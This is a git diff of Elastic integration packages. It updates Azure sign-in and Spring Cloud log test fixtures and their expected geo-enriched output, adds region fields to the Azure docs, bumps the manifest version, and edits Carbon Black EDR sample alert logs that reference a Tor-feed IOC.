a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log index 04d29250a6f..6003b0ce3fa 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log @@ -1,2 +1,2 @@ -{"Level":"4","callerIpAddress":"1.1.1.1","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"1.1.1.1","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} -{"Level":"4","callerIpAddress":"8.8.8.8","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"8.8.8.8","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} \ No newline at end of file +{"Level":"4","callerIpAddress":"81.2.69.144","category":"SignInLogs","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.2.69.144","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"test@elastic.co"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} +{"Level":"4","callerIpAddress":"81.2.69.144","category":"SignInLogs","correlationId":"a8d4eb85-90c5-740d-9af6-7a15036cd135","durationMs":0,"identity":"Test LTest","location":"FR","operationName":"Sign-in activity","operationVersion":"1.0","properties":{"appDisplayName":"Office 365","appId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","clientAppUsed":"Browser","conditionalAccessStatus":"notApplied","correlationId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","createdDateTime":"2019-10-18T04:45:48.0729893-05:00","deviceDetail":{"browser":"Chrome 77.0.3865","deviceId":"","operatingSystem":"MacOs"},"id":"8a4de8b5-095c-47d0-a96f-a75130c61d53","ipAddress":"81.2.69.144","isInteractive":false,"location":{"city":"Champs-Sur-Marne","countryOrRegion":"FR","geoCoordinates":{"latitude":48.12341234,"longitude":2.12341234},"state":"Seine-Et-Marne"},"originalRequestId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","processingTimeInMilliseconds":239,"riskDetail":"none","riskLevelAggregated":"none","riskLevelDuringSignIn":"none","riskState":"none","servicePrincipalId":"","status":{"errorCode":50140,"failureReason":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in."},"tokenIssuerName":"","tokenIssuerType":"AzureAD","userDisplayName":"Test LTest","userId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","userPrincipalName":"c3813493-bf92-5123-2717-8a8b2979c38b"},"resourceId":"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam","resultDescription":"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.","resultSignature":"None","resultType":"50140","tenantId":"8a4de8b5-095c-47d0-a96f-a75130c61d53","time":"2019-10-18T09:45:48.0729893Z"} \ No newline at end of file diff --git a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json index 54a103981d1..8dfb4154a46 100644 --- a/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json +++ b/packages/azure/data_stream/signinlogs/_dev/test/pipeline/test-signinlogs-raw.log-expected.json @@ -6,22 +6,25 @@ }, "source": { "geo": { - "continent_name": "Oceania", - "country_name": "Australia", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 143.2104, - "lat": -33.494 - }, - "country_iso_code": "AU" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 13335, + "number": 20712, "organization": { - "name": "Cloudflare, Inc." + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "1.1.1.1", - "ip": "1.1.1.1" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", "tags": [ @@ -45,16 +48,16 @@ }, "related": { "ip": [ - "1.1.1.1" + "81.2.69.144" ] }, "client": { - "ip": "1.1.1.1" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.721058600Z", - "original": "{\"Level\":\"4\",\"callerIpAddress\":\"1.1.1.1\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"1.1.1.1\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "ingested": "2021-12-09T13:30:59.716497500Z", + "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"test@elastic.co\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", "id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", @@ -126,22 +129,25 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", - "ip": "8.8.8.8" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "message": "This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.", "tags": [ @@ -165,16 +171,16 @@ }, "related": { "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "client": { - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "event": { "duration": 0, - "ingested": "2021-09-28T19:32:37.721325100Z", - "original": "{\"Level\":\"4\",\"callerIpAddress\":\"8.8.8.8\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"8.8.8.8\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", + "ingested": "2021-12-09T13:30:59.716506200Z", + "original": "{\"Level\":\"4\",\"callerIpAddress\":\"81.2.69.144\",\"category\":\"SignInLogs\",\"correlationId\":\"a8d4eb85-90c5-740d-9af6-7a15036cd135\",\"durationMs\":0,\"identity\":\"Test LTest\",\"location\":\"FR\",\"operationName\":\"Sign-in activity\",\"operationVersion\":\"1.0\",\"properties\":{\"appDisplayName\":\"Office 365\",\"appId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"clientAppUsed\":\"Browser\",\"conditionalAccessStatus\":\"notApplied\",\"correlationId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"createdDateTime\":\"2019-10-18T04:45:48.0729893-05:00\",\"deviceDetail\":{\"browser\":\"Chrome 77.0.3865\",\"deviceId\":\"\",\"operatingSystem\":\"MacOs\"},\"id\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"ipAddress\":\"81.2.69.144\",\"isInteractive\":false,\"location\":{\"city\":\"Champs-Sur-Marne\",\"countryOrRegion\":\"FR\",\"geoCoordinates\":{\"latitude\":48.12341234,\"longitude\":2.12341234},\"state\":\"Seine-Et-Marne\"},\"originalRequestId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"processingTimeInMilliseconds\":239,\"riskDetail\":\"none\",\"riskLevelAggregated\":\"none\",\"riskLevelDuringSignIn\":\"none\",\"riskState\":\"none\",\"servicePrincipalId\":\"\",\"status\":{\"errorCode\":50140,\"failureReason\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\"},\"tokenIssuerName\":\"\",\"tokenIssuerType\":\"AzureAD\",\"userDisplayName\":\"Test LTest\",\"userId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"userPrincipalName\":\"c3813493-bf92-5123-2717-8a8b2979c38b\"},\"resourceId\":\"/tenants/8a4de8b5-095c-47d0-a96f-a75130c61d53/providers/Microsoft.aadiam\",\"resultDescription\":\"This error occurred due to 'Keep me signed in' interrupt when the user was signing-in.\",\"resultSignature\":\"None\",\"resultType\":\"50140\",\"tenantId\":\"8a4de8b5-095c-47d0-a96f-a75130c61d53\",\"time\":\"2019-10-18T09:45:48.0729893Z\"}", "kind": "event", "action": "Sign-in activity", "id": "8a4de8b5-095c-47d0-a96f-a75130c61d53", diff --git a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json index ca895903f26..a411804ae1a 100644 --- a/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json +++ b/packages/azure/data_stream/springcloudlogs/_dev/test/pipeline/test-springcloudlogs-raw.log-expected.json @@ -1,50 +1,51 @@ { "expected": [ { - "@timestamp": "2021-07-01T19:30:30.535Z", - "azure": { - "resource": { - "group": "SA-HEMANT", - "id": "/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC", - "name": "HM-SC-PETCLINIC", - "provider": "MICROSOFT.APPPLATFORM/SPRING" - }, - "springcloudlogs": { - "category": "ApplicationConsole", - "event_category": "Administrative", - "log_format": "RAW", - "operation_name": "Microsoft.AppPlatform/Spring/logs", - "properties": { - "app_name": "admin-server", - "instance_name": "admin-server-default-12-8459d44f68-g4b5f", - "service_id": "c41fd000b1a5450eb234039376da26de", - "service_name": "hm-sc-petclinic", - "stream": "stdout" - } - }, - "subscription_id": "EDD63B67-0BA2-4837-A4EB-CD484E9FF623" + "geo": { + "name": "westus2" }, "cloud": { "provider": "azure" }, + "@timestamp": "2021-07-01T19:30:30.535Z", "ecs": { "version": "1.10.0" }, - "event": { - "action": "Microsoft.AppPlatform/Spring/logs", - "kind": "event", - "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}" - }, - "geo": { - "name": "westus2" - }, "log": { "level": "Informational" }, + "event": { + "action": "Microsoft.AppPlatform/Spring/logs", + "ingested": "2021-12-09T13:31:00.534484200Z", + "original": "{ \"time\": \"2021-07-01T19:30:30.535404056Z\", \"LogFormat\": \"RAW\", \"resourceId\": \"/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC\", \"operationName\": \"Microsoft.AppPlatform/Spring/logs\", \"category\": \"ApplicationConsole\", \"level\": \"Informational\", \"location\": \"westus2\", \"properties\": {\"Log\":\"2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\\n\",\"Stream\":\"stdout\",\"AppName\":\"admin-server\",\"InstanceName\":\"admin-server-default-12-8459d44f68-g4b5f\",\"ServiceId\":\"c41fd000b1a5450eb234039376da26de\",\"ServiceName\":\"hm-sc-petclinic\"}}", + "kind": "event" + }, "message": "2021-07-01 19:30:30.535 INFO 1 --- [oundedElastic-9] c.c.c.ConfigServicePropertySourceLocator : Located environment: name=admin-server, profiles=[mysql], label=null, version=638a1af7fc8d331d7eb26a571275e954632717e8, state=null\n", "tags": [ "preserve_original_event" - ] + ], + "azure": { + "subscription_id": "EDD63B67-0BA2-4837-A4EB-CD484E9FF623", + "resource": { + "name": "HM-SC-PETCLINIC", + "id": "/SUBSCRIPTIONS/EDD63B67-0BA2-4837-A4EB-CD484E9FF623/RESOURCEGROUPS/SA-HEMANT/PROVIDERS/MICROSOFT.APPPLATFORM/SPRING/HM-SC-PETCLINIC", + "provider": "MICROSOFT.APPPLATFORM/SPRING", + "group": "SA-HEMANT" + }, + "springcloudlogs": { + "operation_name": "Microsoft.AppPlatform/Spring/logs", + "log_format": "RAW", + "category": "ApplicationConsole", + "event_category": "Administrative", + "properties": { + "app_name": "admin-server", + "instance_name": "admin-server-default-12-8459d44f68-g4b5f", + "stream": "stdout", + "service_name": "hm-sc-petclinic", + "service_id": "c41fd000b1a5450eb234039376da26de" + } + } + } } ] } \ No newline at end of file diff --git a/packages/azure/docs/README.md b/packages/azure/docs/README.md index 2de6c43a48f..3b72a2bb244 100644 --- a/packages/azure/docs/README.md +++ b/packages/azure/docs/README.md @@ -234,6 +234,8 @@ An example event for `activitylogs` looks as following: | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | +| geo.region_iso_code | Region ISO code. | keyword | +| geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | diff --git a/packages/azure/docs/activitylogs.md b/packages/azure/docs/activitylogs.md index eafa43d497d..01e69aa8c0b 100644 --- a/packages/azure/docs/activitylogs.md +++ b/packages/azure/docs/activitylogs.md @@ -223,6 +223,8 @@ An example event for `activitylogs` looks as following: | geo.country_iso_code | Country ISO code. | keyword | | geo.country_name | Country name. | keyword | | geo.location | Longitude and latitude. | geo_point | +| geo.region_iso_code | Region ISO code. | keyword | +| geo.region_name | Region name. | keyword | | host.architecture | Operating system architecture. | keyword | | host.containerized | If the host is a container. | boolean | | host.domain | Name of the domain of which the host is a member. For example, on Windows this could be the host's Active Directory domain or NetBIOS domain name. For Linux this could be the domain of the host's LDAP provider. | keyword | diff --git a/packages/azure/manifest.yml b/packages/azure/manifest.yml index db7aa13d2e1..b94220976e6 100644 --- a/packages/azure/manifest.yml +++ b/packages/azure/manifest.yml @@ -1,6 +1,6 @@ name: azure title: Azure Logs -version: 0.12.0 +version: 0.12.1 release: beta description: This Elastic integration collects logs from Azure type: integration diff --git a/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log b/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log index 88960c3e0ea..334e4295725 100644 --- a/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log +++ b/packages/carbonblack_edr/_dev/deploy/docker/sample_logs/cb_edr.ndjson.log @@ -1,8 +1,8 @@ {"server_name":"cb-enterprise-testing.local","docs":[{"process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","sensor_id":1,"modload_count":49,"parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" ","filemod_count":0,"id":"00000001-0000-afbc-01cf-b31b9e83777f","parent_name":"explorer.exe","parent_md5":"332feab1435662fc6c672e25beb37be3","group":"Default Group","hostname":"WIN8-TEST","last_update":"2014-08-08T15:15:47.544Z","start":"2014-08-08T15:15:42.193Z","regmod_count":6,"process_pid":44988,"username":"win8-test\\admin","process_name":"putty.exe","path":"c:\\users\\admin\\desktop\\putty.exe","netconn_count":1,"parent_pid":2532,"segment_id":1,"host_type":"workstation","os_type":"windows","childproc_count":0,"unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001"}],"event_timestamp":1407362104.19,"watchlist_id":10,"cb_version":"4.2.1.140808.1059","watchlist_name":"Tor Feed"} {"server_name":"cb-enterprise-testing.local","docs":[{"digsig_result":"Signed","observed_filename":["c:\\windows\\system32\\prncache.dll"],"product_version":"6.1.7601.17514","signed":"Signed","digsig_sign_time":"2010-11-21T00:37:00Z","is_executable_image":true,"orig_mod_len":183808,"is_64bit":true,"digsig_publisher":"Microsoft Corporation","group":["Default Group"],"file_version":"6.1.7601.17514 (win7sp1_rtm.101119-1850)","company_name":"Microsoft Corporation","internal_name":"PrintCache","product_name":"Microsoft® Windows® Operating System","digsig_result_code":"0","timestamp":"2014-08-09T11:19:04.009Z","copied_mod_len":183808,"server_added_timestamp":"2014-08-09T11:19:04.009Z","md5":"A1CDE92DDC170D307DB3C5BAA348811B","endpoint":["WIN8-TEST|1"],"legal_copyright":"© Microsoft Corporation. All rights reserved.","original_filename":"PrnCache.dll","os_type":"Windows","file_desc":"Print UI Cache"}],"event_timestamp":1407583203.5,"watchlist_id":10,"cb_version":"4.2.1.140811.29","watchlist_name":"SRS Trust"} -{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","report_id":"TOR-Node-38.229.70.52","ioc_type":"ipv4","ioc_value":"38.229.70.52","ioc_attr":{"port":22,"protocol":"TCP","direction":"Outbound"},"hostname":"FS-NYC-1","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_id":14,"feed_name":"tor","event_timestamp":1407362000} +{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","report_id":"TOR-Node-81.2.69.144","ioc_type":"ipv4","ioc_value":"81.2.69.144","ioc_attr":{"port":22,"protocol":"TCP","direction":"Outbound"},"hostname":"FS-NYC-1","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_id":14,"feed_name":"tor","event_timestamp":1407362000} {"md5":"506708142BC63DABA64F2D3AD1DCD5BF","report_id":"dxmtest1_04","ioc_type":"md5","ioc_value":"506708142bc63daba64f2d3ad1dcd5bf","ioc_attr":{},"feed_id":7,"hostname":"FS-SEA-529","sensor_id":3321,"cb_version":"4.2.1.140808.1059","server_name":"localhost.localdomain","feed_name":"dxmtest1","event_timestamp":1397244093.682} -{"process_id":"00000001-0000-afbc-01cf-b31b9e83777f","segment_id":1,"docs":{"modload_count":0,"host_type":"workstation","netconn_count":"1","os_type":"windows","unique_id":"00000001-0000-afbc-01cf-b31b9e83777f-00000001","username":"win8-test\\admin","last_update":"2014-08-08T15:15:47.544Z","parent_md5":"332feab1435662fc6c672e25beb37be3","path":"c:\\users\\admin\\desktop\\putty.exe","filemod_count":0,"regmod_count":6,"process_name":"putty.exe","cmdline":"\"c:\\users\\admin\\desktop\\putty.exe\" ","parent_unique_id":"00000001-0000-09e4-01cf-a5dee70168f2-00000001","childproc_count":0,"process_pid":"44988","start":"2014-08-08T15:15:42.193Z","process_md5":"a3ccfd0aa0b17fd23aa9fd0d84b86c05","parent_name":"explorer.exe","parent_pid":"2532","group":"Default Group"},"report_id":"TOR-Node-38.229.70.52","ioc_type":"ipv4","ioc_value":"38.229.70.52","ioc_attr":{"port":"22","protocol":"TCP","direction":"Outbound"},"hostname":"WIN8-TEST","sensor_id":1,"cb_version":"4.2.1.140808.1059","server_name":"localhost","feed_id":14,"feed_name":"tor","event_timestamp":1407362099.567} 